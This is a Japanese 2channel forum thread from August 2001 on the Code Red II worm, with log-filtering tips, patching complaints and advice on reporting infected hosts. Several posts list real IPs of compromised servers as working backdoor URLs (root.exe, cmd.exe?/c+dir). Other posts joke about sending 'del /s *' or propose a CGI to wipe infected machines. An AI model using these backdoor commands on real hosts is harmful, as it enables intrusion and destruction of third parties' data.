145 :腹ヘッタ:2001/08/07(火) 19:28
http://61.138.138.109/

146 :名無しさん@お腹いっぱい。:2001/08/07(火) 19:29
>>98
ワームがいちいちRedirect先を見に行くわけないだろうが。

147 :腹ヘッタ:2001/08/07(火) 19:32
http://61.136.9.22/
http://61.76.108.197/

148 :名無しさん@お腹いっぱい。:2001/08/07(火) 19:43
>>146
98じゃないけど

ProxyPass /default.ida http://www.microsoft.com
なら銅?

149 :146:2001/08/07(火) 19:56
>>148
いや、いいけど…。
何が悲しゅうてクソのために自分がMSにアクセスしに行かなきゃならんのだ。

150 :名無しさん@お腹いっぱい。:2001/08/07(火) 20:02

今になってもまだ気づかないなら、警告してあげたらだめなの?
いい加減にして下さい。うざいっす。
http://203.140.142.178/scripts/root.exe?/c+dir+"c:\"

151 :名無しさん@お腹いっぱい。:2001/08/07(火) 20:03
「コード・レッドC」駆除ソフトを無償配布=トレンドマイクロ

 トレンドマイクロは7日、米国を中心に猛威をふるっている新種のコンピュー
ターウイルス「コード・レッドC」を自動的に駆除するソフトを、インターネッ
ト上で無償提供すると発表した。無償ソフトはhttp://www.tren
dmicro.co.jp/virusinfo/index.aspのサイト
で提供される。同ウイルスは感染に気付きにくいため、日本国内でも多くのサー
バーに侵入している可能性があるという。

152 :名無しさん@お腹いっぱい。:2001/08/07(火) 20:07
>>148
ワームはサーバの言ったことなど聞いてないと思われ

153 :148:2001/08/07(火) 20:08
このまま放置しても何も変わらないと思うのヨ
*.co.jp にはメール打ってるけど
*.kr とかいつまでも続きそう...

今日までで7千近くアクセスされてる(鬱

154 :名無しさん@お腹いっぱい。:2001/08/07(火) 20:09
CodRedな鯖だと思って見たらsadmindにもやられてたYO!

155 :146:2001/08/07(火) 20:11
せっかくなので、Apache 使いの人へ。
Code Red II のログだけを別ファイルに隔離する設定。

SetEnvIf Request_URI default\.ida code-red
CustomLog /var/log/httpd/access.log combined env=!code-red
CustomLog /var/log/httpd/codered.log common env=code-red

NNNN はヘッダが不正なのでこれでは隔離できないみたい。
XXXX だけが別ファイルに記録される。

156 :148:2001/08/07(火) 20:13
>>152

いんや、ちゃんとリクエスト逝ってるYO!
ステータス200で 3K〜13K ぐらいのレスポンス返してるみたいだけど何に返
してるのかな?

157 :名無しさん@お腹いっぱい。:2001/08/07(火) 20:16
うちの会社のIISにroot.exe叩いてみた。
ウゴイチャターヨ。あはは。del /s *つっこんでみっか。

158 :名無しさん@お腹いっぱい。:2001/08/07(火) 20:23
>>152
ワームに取りに逝かせるんじゃなくて自分で取りに逝ってワームに転送
するの。

159 :腹ヘッタ:2001/08/07(火) 20:24
http://61.77.219.84/
http://61.152.213.6/
http://61.79.100.142/

160 :名無しさん@お腹いっぱい。:2001/08/07(火) 20:39
*.zaq.ne.jp
*.home.ne.jp
から来た!

161 :名無しさん@お腹いっぱい。:2001/08/07(火) 20:42
>>159
何がしたいの?楽しい?

162 :名無しさん@お腹いっぱい。:2001/08/07(火) 20:44
>>161
放置されてると思われ

163 :名無しさん@お腹いっぱい。:2001/08/07(火) 20:47
*.ocn.ne.jp
から来た!

164 :名無しさん@お腹いっぱい。:2001/08/07(火) 20:48
>>163
そこら中からきとる。いちいちさわがんでくれ。

165 :名無しさん@腹へった:2001/08/07(火) 20:49
うちはj-comなのですが、同じj-comから大量アタック!
建前上は鯖禁止なのだか...やれやれですわ

166 :名無しさん@お腹いっぱい。:2001/08/07(火) 20:50
>>161
これだけは言っておく。
......

167 :名無しさん@お腹いっぱい。:2001/08/07(火) 20:51
>>164
これだけは言っておく。
......

168 :名無しさん@お腹いっぱい。:2001/08/07(火) 20:51
あいしてる

169 :腹フッタ:2001/08/07(火) 20:51
  

170 :名無しさん@お腹いっぱい。:2001/08/07(火) 20:54
ここ伸びるの早いね。

171 :名無しさん@お腹いっぱい。:2001/08/07(火) 20:56
>>164
いちいちさわいでるのが、このスレ
いちいちさわいでるのが、2ちゃんねる

172 :名無しさん@お腹いっぱい。:2001/08/07(火) 20:57
Code Red2ってなんじゃ?

173 :名無しさん@お腹いっぱい。:2001/08/07(火) 21:02
>>165
リクエストのログを j-com に送ってやってくれ。

174 : :2001/08/07(火) 21:04
http://www.aalti.co.jp/

ここからcoderedアタックが飛んできた。
んで、サイトの中見たら

次の経験者を募集します。
インターネット関連業務
ホームページ作成
イントラネット関連ソフトの開発
イントラネットシステムの構築
JAVA、VBscript、Perl 等

あかんわ・・・

175 :名無しさん@お腹いっぱい。:2001/08/07(火) 21:05
>>171
昨日は会話に発展があったのだが、ホーワしてしまった。

176 :名無しさん:2001/08/07(火) 21:07
IISから、Apache for win32 にアップグレード
http://www.ring.gr.jp/pub/net/apache/docs/windows.html
http://www.ring.gr.jp/pub/net/apache/dist/httpd/binaries/win32/apache_1.3.20-win32-no_src-r2.msi

ほら、さっさとやれ!!!

177 :名無しさん@お腹いっぱい。:2001/08/07(火) 21:09
>>175
また「しみじみ述べていいですかクン」みたいなのが来ないかなぁ(w

178 :名無しさん@お腹いっぱい。:2001/08/07(火) 21:09
CodeRedにやられるような所はラーメンにもやられるべ

179 :腹ヘッタ:2001/08/07(火) 21:12
http://210.119.33.149/c/winnt/system32/cmd.exe?/c+dir

180 :腹ヘッタ:2001/08/07(火) 21:13
>>179
これだけは言っておく。
……

181 :名無しさん@お腹いっぱい。:2001/08/07(火) 21:14
>>179
要注目だね

182 :名無しさん@お腹いっぱい。:2001/08/07(火) 21:21
>>175
こういうのもなんだけど、
ぜんぜん収まる気配も無くって、、慣れてきた。

183 :名無しさん@飯食った:2001/08/07(火) 21:24
>>173
らじゃ
>>174
わろた

184 :名無しさん@お腹いっぱい。:2001/08/07(火) 21:27
>>182
だぁね。でもさぁ今回の件がどーゆう形にせよ収束してしまったら、
お馬鹿管理者は、「これだけ被害が出てるんだから、悪いのはワーム
で、俺悪くないもんねぇー」って言い出しそうだね。

で、また何ヶ月かしたらおんなじ事繰り返すんだろうな。
>>97
が全然笑い話じゃなくて、本当にお馬鹿管理者の方が楽だし。
変なの。

185 :名無しさん@お腹いっぱい。:2001/08/07(火) 21:27
ApacheでCodeRedのアクセスを"codered.log"に記録するのはいいが、CodeRedのアクセスをaccess.logに記録しないようにするにはどうしたら?

186 ::2001/08/07(火) 21:37
dosアタックまだ?

187 ::2001/08/07(火) 21:38
破壊まだ?

188 :名無しさん@お腹いっぱい。:2001/08/07(火) 21:43
>>185 /%PATH%/default.ida をバーチャルホストにしてログ分けれ

189 :腹ヘッタ:2001/08/07(火) 21:44
http://210.119.33.149/c/winnt/system32/cmd.exe?/c+dir
http://210.220.214.233/c/winnt/system32/cmd.exe?/c+dir
http://210.21.31.181/c/winnt/system32/cmd.exe?/c+dir
http://210.207.36.10/c/winnt/system32/cmd.exe?/c+dir
http://210.91.104.12/c/winnt/system32/cmd.exe?/c+dir
http://210.120.24.191/c/winnt/system32/cmd.exe?/c+dir
http://210.85.108.97/c/winnt/system32/cmd.exe?/c+dir
http://210.91.80.129/c/winnt/system32/cmd.exe?/c+dir
http://210.220.217.151/c/winnt/system32/cmd.exe?/c+dir
http://210.96.195.167/c/winnt/system32/cmd.exe?/c+dir

豊作だ。

190 :名無しさん@お腹いっぱい。:2001/08/07(火) 21:52
>>189
わざわざ載せなくても、ログですぐわかりますがな。

191 :GET /default.ida?XXXX:2001/08/07(火) 21:53
あのさ、CodeRedのTとUって、別物??同じ穴、NとXの違いで使うのに。
Uってホワイトハウス攻撃しそうに無いんだけど。。。
次回対象のIPアドレスはランダムに生成するみたいだけど、感染元の隣接ネットワーク
当たるの好きみたいね。だから伝染するの早いんだって。どっかに書いてあった。

192 :名無しさん@お腹いっぱい。:2001/08/07(火) 21:54
>>191
超既出あぼーん

193 :名無しさん@お腹いっぱい。:2001/08/07(火) 21:55
>>191
過去ログ全部読んで出直せ。

194 :名無しさん@お腹いっぱい。:2001/08/07(火) 21:55
>>191
>>1>>2 の情報源見てから書け。

195 :191:2001/08/07(火) 21:57
>>192
だって、書くことナインダモン。。。。。

196 :え〜ん:2001/08/07(火) 21:57
今度code redマスコット作ったよ。

197 :名無しさん@お腹いっぱい。:2001/08/07(火) 21:58
>>186 やられたいのかゴルァ
>>187 壊して欲しけりゃパッチなし IIS 入れろゴルァ

198 :名無しさん@お腹いっぱい。:2001/08/07(火) 21:58
なんか減ってきたんだけど
漏れのとこだけか?

199 :名無しさん@お腹いっぱい。:2001/08/07(火) 21:59
>>198
昨日の晩もそんな書きこみあったねぇ

200 :198:2001/08/07(火) 22:01
減ってくるとちょびっと寂しい気がする

201 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:02
>>199
infowebだけど夜になってから ppp.infoweb.〜 が無くなったような?
今ごろだが対策したか?

202 :はにわ:2001/08/07(火) 22:02
>>198
ウチはまだすごいぞ。

203 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:04
こいつ酷い。
Code Red だけじゃなくてSad Mindにもやられてる
ファイル共有有効でAdminパスワード無しだし。(笑)
Cドライブまで丸見えはちょっとまずいのでは・・・・

http://211.119.182.80/

204 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:05
今えらい勢いでぞぬアラームが点滅しまくったよ。
初めてかな?

205 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:05
そうだな〜
10分に2〜4アクセスまで減ってきたような感じ。
へってねーか。

206 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:06
>>203
まずいんではとか言いながらさらすなYO

207 :198:2001/08/07(火) 22:08
k○rnet.netってとこ経由ですげーきてたんだけど
ぜんぜんこなくなった。
トップで注意促してるからいくらなんでも気が付いたってことか

208 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:12
相変わらす5分おきに2〜3アクセスきます。
しかし、明らかにpppなinfowebが多すぎ。
RemoteProcedureCallってのも混じってくるようになったんだけど。

209 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:13
遅ればせながら、あぱっち for W32でログを取り始めたんだけど、
DocumentRootにダミーのdefault.ida置いとかないとエラーログ
のほうに逝っちゃうよ(;´Д`)ヨクワカラン
default.idaの中身は「http://www.2ch.net/」でいいんだよね

210 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:14
同じプロバの奴から2発来てる。
管理者にメール送っておくべき?ちなみにiij4u。

211 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:14
http://security.chosun.ac.kr/
securityが聞いてあきれる。

212 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:17
うちは、plalaとhi-hoだけになったな。
プロバイダの技量がシレるってか。

213 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:19
pppのinfowebって多分@niftyだと思う。(おれもntt*****.ppp.infoweb.ne.jpになってるし)
一応、@niftyには20件近くログ提出して
対応してくださいとは言っておいたけど・・・

214 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:20
感染して24時間後にリブートするし、いいかげんパープーでも気づくだろ。
減ってもよさそうなもんだ

>>2 のSecurityFocus記事リンク参照。

さっきはじめて真面目に読んだけど、cmd.exe参照も膨大だったのか。

215 :201:2001/08/07(火) 22:22
>>201
眼の錯覚でした。

216 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:23
Asahi-netから3連発、その他、3〜5分おきにきている
全部が 61.*.*.*  

217 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:23
>>210
ログを iij に送りましょう。

218 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:24
http://www.zdnet.co.jp/broadband/0108/07/codered.html
CodeRedの攻撃でルータも悲鳴

既出だったらごめんね

219 :名無し:2001/08/07(火) 22:24
>>155
LOGが見やすくなりました。THX

220 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:25
>>216
確かに61から始まるのって多いよね。
誰か理由知ってる?

221 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:26
ログ解析したら2000アクセス(3日)のうち7割はKRからだった。
こいつら気がついていないのか?

222 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:28
>>220
第一オクテット同じ、第二オクテット同じところに選択的に送信するそうな。
61系は比較的新しいし、にわかサーバが多いんでは。

223 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:30
>>221
krも感染後24時間後リブートだし、サーバより、DSLユーザでクライアントのw2kが多いんじゃないかな?
#根拠レス

224 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:36
ねーねー

とりあえず/default.idaに仮cgi置いて環境変数REMOTE_ADDRで
IP取って自動で管理者にメール送ったりしたらどうかな?

・・・・自分の鯖のリソースをCGIとメールでさらに使う事になるけど


それとも感染者がcmd.exeport80で実行出来るなら
当然formatとかdel *も実行できるんだよね?
仮CGIで片っ端から殺すのって恐ろしいほど簡単なCGIで出来ると思うけど
まぢでやろうかとちょっと思っちゃうよ・・・・

ウチ1分おきにアタックが続いててマジで影響でてんのよ

225 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:40
SUNがMicrosoftの開発言語(C/C++のどこがじゃ(藁)を批判。
Javaで書けと逝っている。ご都合主義な。
http://www.zdnet.co.jp/broadband/0108/07/bof.html

226 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:40
>>224
定期的にこの書き込みあるな。
自分からわざわざ糞スパマーの一員になったり、
犯罪者になりたいというなら止めない。
そうでなければやめとけ。

227 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:41
>>224
捕まるからよせと多数既出。捕まりたければ黙ってやり多摩へ。

228 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:42
俺んところは210なんで9割以上210からだな。
第二オクテットまででカンコックと見分けられるが能力付きそうだよ(鬱

229 :なー:2001/08/07(火) 22:43
>>224
数秒おきという強者も居るので我慢しなさい。

230 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:44
>>224
とりあえずIPだけからメール送れれば困らんのだが、送れんから問題になっている
#仮に遅れてもただのメールボムになってしまうように思うが。

ほっといても24時間後に勝手にRebootしてワーム消える(裏口残る)仕様だよ。

231 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:46
>>203

ディアブロUがインストールされてるな
あと、デュアルブート仕様だね。
他人のマシンの中ってなかなか興味深いね

232 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:48
>>231
触っちゃ駄目よ、見るだけよ♪

233 :CodeRedIIは笑えた!:2001/08/07(火) 22:49
━━━━━CodeRedIIは笑えた!
default.ida1000アクセスごとにカウントしてたのってオレだけ?
(よっしゃー2000アクセス突破!よーし次は3000アクセス突破しろーって)
でも結局は6000アクセスしかきてねえんだよね。全然、騒ぐほどじゃないし。
CodeRedIIは笑えた。まじで
SlashdotJapanで知って、手を叩いてわらったなぁ。
おまえらがCodeRedIIにあってる間、2chでIP晒し上げてた
アホだなーこいつらって思いながら
わざわざnet sendで警告送ろうかと思ったよ。
でもCodeRedIIのおかげで何かしらの利益を得た人だっている訳だし
結果的には良かったんじゃないかな。
たしかJPCertやIPAがユーザーへのAdvisoryを渋っていたけどさ、
あそこらへんってADSL厨が多いからそのまま全滅させたかったんだよね。
今でもブロードバンドで繋いでるやつがいるらしいけど、
せこいんだよ!俺らの帯域なんだよね。むかつく。
ところでCodeRedII感染後はあいつらってインターネットどうしてたの?
もしかして気づかずに露画像ダウソ?厨房だなぁー。
どちらにしろSECURITY.NLのRed Code worm statsはまさに
原子爆弾のようで壮観だった!
気持ちの良い夕刻でした

234 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:52
>>233 そろそろ出るとオモタヨ!

235 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:53
>>233
ツマンナイYO!

236 :名無しさん@お腹いっぱい。:2001/08/07(火) 22:54
>>233
とりあえず、xDSLしながら国際電話で露画像はないだろうが、
CodeRedI,IIが自粛仕様だからまだマシなような?
#破壊よりは、裏口入学が主目的だろう。

237 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:01
root.exeってなんの権限で動くのかね。
formatまでは無理なんじゃねーの。

238 :名無しさん@もうお腹いっぱい。 :2001/08/07(火) 23:03
>>237
Windowsの権限なんてあって無いようなモンだろ(藁

239 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:03
>>237
Administrator権限だよ…

240 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:06
>>237
LocalSystem だよ。

241 :名無し娘。:2001/08/07(火) 23:07
>>237
LocalSystemだよ

242 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:07
なんでもできちゃうね。

243 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:08
どっちなんすか?

244 :名無し娘。:2001/08/07(火) 23:08
>>240
気が合いますね。ケコーンしましょう。

245 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:08
ログファイルを消した後フォーマットだな

246 :名無しさん@もうお腹いっぱい。:2001/08/07(火) 23:11
>>242
トラぶったら再起動、再インストールする
しかないような前時代的なOSだからね。
それにしてもこのスレッド、実際にIISを
乗っ取られた人は書き込んでないのかな?
ぜひ顛末を聞せてクレ!

247 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:12
シロウトがしゃしゃり出る場所じゃないでしょうけど。
素朴な質問、CodeRedIIって収まりつつあるんですか?

248 :240:2001/08/07(火) 23:12
>>244 CodeRed が収まったらね。

249 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:15
>>247

少なくとも今日までのログを見る限りは増え続けてるよ

250 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:19
ネットやメールのスピードは普通に戻っているように見えるんですけど。

251 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:20
Win2000プロで、サーバ立てていないんですが、僕も仲間に入りたく
なりました。どうやったら攻撃されているのを見れますか?
ノートンのインターネットセキュリティは持ってます。

252 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:22
KRを隔離すれば収まる気がする。

253 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:23
>>251
Apache入れてログ見ろ。ただし素人はヘタに
手をだすとやけどするぜ! 覚悟しとき。

254 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:24
>>251

ファイヤウォールのイベントログを見よ

255 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:26
ぺプシの Code Red 入手したのでカクテルを作ってみました。

「パケット・ストーム」

材料
 ジン 1/3
 ドライ・ヴェルモット 1/3
 ぺプシ "Code Red" 1/3

以上をステアして、カクテル・グラスに注ぎます。
カンパリで赤色を付けてもよいでしょう。

256 :>246:2001/08/07(火) 23:26
うちの学校のサーバは7月28日以降のログが消されてた。
外に向けて何かやってたらしい。システム自体はいじられなかったみたい。
当然再インストールだけど。

257 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:27
タスクマネージャのプロセスであるプロセスが動いてると危険と言われましたが失念。知ってる人いたら教えてもらえない?

258 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:28
>>251
早い話がhttpのGETメソッドが投げられてくるって事
もっと掘り下げればPort80に不信なものが来るって事。

259 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:29
>>251
ルーターのsyslogとって見れば

260 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:29
>>251
CodeRed観察ツール
http://www.rental-web.com/~big-z/info/

夕方の転載。賛否両論あったけどね(w

261 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:34
某大学から凄まじい数のスキャン来てるんだけど、管理者にメール送ったほう良いのかな?
その管理者大目玉になるのが目に見えるから可哀想で今のところ躊躇。

262 :名無し:2001/08/07(火) 23:36
日本ベリサインのWebサイトに不正アクセス

http://biztech.nikkeibp.co.jp/wcs/show/leaf?CID=onair/biztech/prom/137133

263 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:37
>>254
なぁ〜んないの。
>>258
Port80は閉じてるし。なんか勘違いしてる?
>>251
それが一番かなぁ。

264 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:40
スキャン回数が3の倍数なのは80,1080,8080がスキャンされているということでしょうか?

265 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:40
>>262
そりゃ問題だね。

266 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:45
>>261
攻撃を放置するほうが悪。連絡いれましょう。
>>262
とりあえずこのスレとは関係なし
>>264
違います。

267 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:46
>>264
ではどうゆうことでしょうか?

268 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:50
>>267
SYNのリトライ

269 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:52
ttp://www.oresama.org/default.ida

270 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:53
>>269 サイコー!!
俺もなんかしこんどこ。

271 :名無しさん@お腹いっぱい。:2001/08/07(火) 23:54
>>203


うーん そのホムペにいくと Sad Mindに 感染します 南無ー

272 :名無し:2001/08/08(水) 00:00
9:45から2HでCRが72匹

9匹 jpどめ
63匹 krどめ 61と202が1匹づつ 残りは211

海底ケーブル 斬ってよし

273 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:01
>>271

というよりそのホムペのあるサーバーが感染してるだけだろ

274 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:01
>>269
やべぇ、笑った
ダミーのdefault.idaを早速入れ替えた

275 :腹へった:2001/08/08(水) 00:02
>>269

( ´∀`)

276 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:05
こんなところからもキターヨ
http://dns.taica.com.tw/

277 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:06
>>276
認証局がコレではアレでナニだ。

278 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:08
>>276
ていうか、最新消息がぜんぜん最新ちゃう。

279 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:08
個人PCで感染してる奴っていったい何やってんだ?
デフォルト状態じゃ感染しないだろ?
本当に迷惑だな。

280 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:09
どうでもいいが、そのdefault.idaは誰が見るんだよ(w

281 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:09
>>279
ホムペチェックに使用し後片付けわすれたと思ワレ。

282 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:12
>>280
いや、競うなら今のうちだ(藁

283 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:12
>>276 CA か。そういやさっきも日本ベリサインがやられてたな。

284 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:13
>>279
個人でも、Win2KPで、W3Sを入れてるとかかります。
ホムペテストなんかしてる人は注意を

285 :え〜ん:2001/08/08(水) 00:14
インフォメーションサービス、WIN2Kはデフォルトで入ってる。

286 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:15
>>278
民国90年は西暦2001年だよー。

287 :CodeRedで@お腹いっぱい。:2001/08/08(水) 00:16
>>279
何も対応をやってないだけ…

夜になるとまた数が増えてくるな(´-`;)

288 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:17
関係ないけどホムペテストっと何?
ローカルでHTML読むだけじゃだめなの?

289 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:18
>>285
デフォルトじゃ入ってません

290 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:18
直接は関係ないがMSに読んで欲しい。
http://www.atmarkit.co.jp/news/200108/07/msnovell.html

291 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:18
CODEREDOででいったいどのくらいトラフィックが混雑しているのかきになる

292 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:19
>>288
Activeバッテンとか、あくてぃぶさーばーぱっぱらぱーを開発した場合に必須。

293 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:20
だいたい。 感染しているマシンは、パッチを当てたくても、スピードが遅すぎて、
本当に当てられるのかどうか、疑問。
何時間何日かかる事やら。
回線切られた奴は、一生パッチ当てられないぞ。どうすんだ?

294 :名無しさん@Emacs:2001/08/08(水) 00:20
>>269 ヤマザキワラタヨ

295 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:20
>>293
再インストール(w

296 :え〜ん:2001/08/08(水) 00:22
>>28
ほんと、コンピューターの管理でサービスとアプリケーションの
下になんかない?

297 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:22
>>269
芸が細かいというか、暇人というか・・・(w

298 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:22
>>269見直して気付いたけど、コメントがなめてる(w
どうでもいいが、<BODY>ぐらい書くのさぼるなよ

299 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:23
>>293
リブートしてトロイ削除してレジストリ直してIIS止めてプロバに電話して、
パッチ当て・・・る、脳があれば世話ないな。
低脳クンでなくて、うっかりクン、不精クン、しまったクンだったら、まだいいんだが・・・

300 :296:2001/08/08(水) 00:23
>>289
まちがった

301 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:23
過去ログ読めとかかなり言われそうで嫌なんだけど、人多そうなので思い切って聞いてみる。
IISが動いているマシンだと放置しとくだけで感染してしまうのかしら?

302 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:25
確実に増殖してるね。いずれ収束するんだろうか?
アタック元の管理者にかたっぱしから連絡しないと事態が収まらないような気がしてきた。

303 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:25
>>301
IISに、インデックスサービス(これもデフォ)が入ってるとそうなる。
イントラ用ならルータで80切っとけばいいけど。

304 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:26
>>298
漢字コード誤認識防止のおまじない文字列の1つ
けど実際にあれ選んでるのは初めて見た(w

305 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:28
>>304
つーかあんなもん化けてもいいじゃないか(w

306 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:28
>>302
@niftyだけど、とりあえず、昨日よりは少ない。
不精君でも、リブートするから、気が付くんじゃないか?
うちの会社は、遅ればせながら今日、社内総点検命令が出てました。

307 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:28
要らないサービスは 入れない 付けない 起動させない
これ基本

308 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:28
>>301
1.ネットワークからIIS+Indexサーバにアクセス可能
2.必要なパッチがあたっていない

以上の条件を満たしていたらアウトです。
ネットワークからってのは、インターネットから直接に限らず、
LAN内から侵入される可能性も大いにあります。

309 :もう:2001/08/08(水) 00:28
へへ見てちょ
www.nefty.net/desktop/haritsuke/imgboard.cgi

310 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:28
>>301
過去ログ全部読めとは言わんが、せめて >>1 のリンク先
くらいは読めよ

311 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:29
100MB のファイルを置いといたのに 56kB しか食べてくれなかった。

312 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:29
>>299
だよねぇ、なのにある会社の管理部はイントラ内で
大繁殖したからって感染PC全部初期化命令を出しよった。
ローカルディスクを初期化しろってさぁ
いくら危機的でも対処方法があるのにねぇ

313 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:30
2,3ヵ月後に又再発するに15おしりコイン

314 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:31
>>311
 それ、面白い。俺もやろうかな、と思ったけど....
 やっぱ、無意味だよなあ。

315 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:31
23時をまわったからダイヤルアップのアホどもも戦線に参加して来た。

316 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:32
無意味というか、無駄なトラフィック増やしちゃイヤ

317 :293:2001/08/08(水) 00:33
>>295
再インストールしてもすぐ感染するから、パッチを当てないと駄目
>>299
パッチを当てようとしても、OSのバージョンアップしてないと、パッチが当たらないので、
サービスパックをダウンロードして、バージョンアップして、パッチを当てて、というのが、ものすごいじかんがかかる。

318 :311:2001/08/08(水) 00:34
いや、Code Red がバッファオーバーフローしないかなと思ってサ...

319 :管理部:2001/08/08(水) 00:34
>>312
つーかバクドア削除してレジストリ戻して、なんて複雑な作業
できる奴のPCは総じてきっちり防衛できてて、パッチて何?
っていってるようなマヌーな奴のPCが軒並みやられてるわけよ。
でオフィシャル指示としては「感染したら初期化しろ」になったさ。
手順書つくれぇ?アホかーーーーーい。
おまえらの不始末までなんで俺らがかぶらにゃならんのってことよ。

320 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:35
>>315
テレホタイムはプロバイダの担当者帰っちゃってるだろうから
朝までログ集めて、まとめて送り付けて対策しろって言おうかな。

321 :追加:2001/08/08(水) 00:35
>>317
今の状態だと、そーやって再インストールしてる間に感染。

322 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:36
なんか、不思議だよな>ダイアルアップ
前回のアクセスからリブートしていないわけないと思うから
再感染なのかな。

323 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:38
>>319
じつはこの話、ちゃんとした情報処理の会社なんだけどね
しかも超大手・・・

324 :>>321:2001/08/08(水) 00:39
インストール中はケーブルはずせやゴルァ

325 :293:2001/08/08(水) 00:39
>>317
それ以前に、英語が分からなくて、パッチが当てられない人が大多数だと思うぞ。
パッチなんて、素人が当てるとは想定してないからな。

326 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:39
バッチを落としてる間に感染したら終わりじゃないのか?
初心者はバッチをメディアに保存して再インストールだな。
CodeRedの駆除法教えてください厨房に説明するのは疲れそう。

327 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:40
>>319
よく考えたら、IIS動かす必要のない奴に関しては
「IIS止めれ」
で済むのでは。バックドアもIIS経由だし。

328 :管理部:2001/08/08(水) 00:40
>>323
オレがその大手の管理部だって発想はない?

329 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:41
>>328
ご愁傷さまです。

330 :追加:2001/08/08(水) 00:42
>>324
えぇだって、パッチはサーバに有るじゃん。
てか、DHCPサーバ探すのに時間がかかるしぃ。
やだ、やだ、えらそうにぃ。
って言われる会社に1票

331 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:43
せっかく感染してるのだから、バックドアつかって直すとか。

332 :>:2001/08/08(水) 00:44
The Internetから切れ>感染馬鹿

333 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:44
ほんとご苦労様です。
でも12時間もネット止ると仕事にならんよ
原因の通知だって、翌朝だし

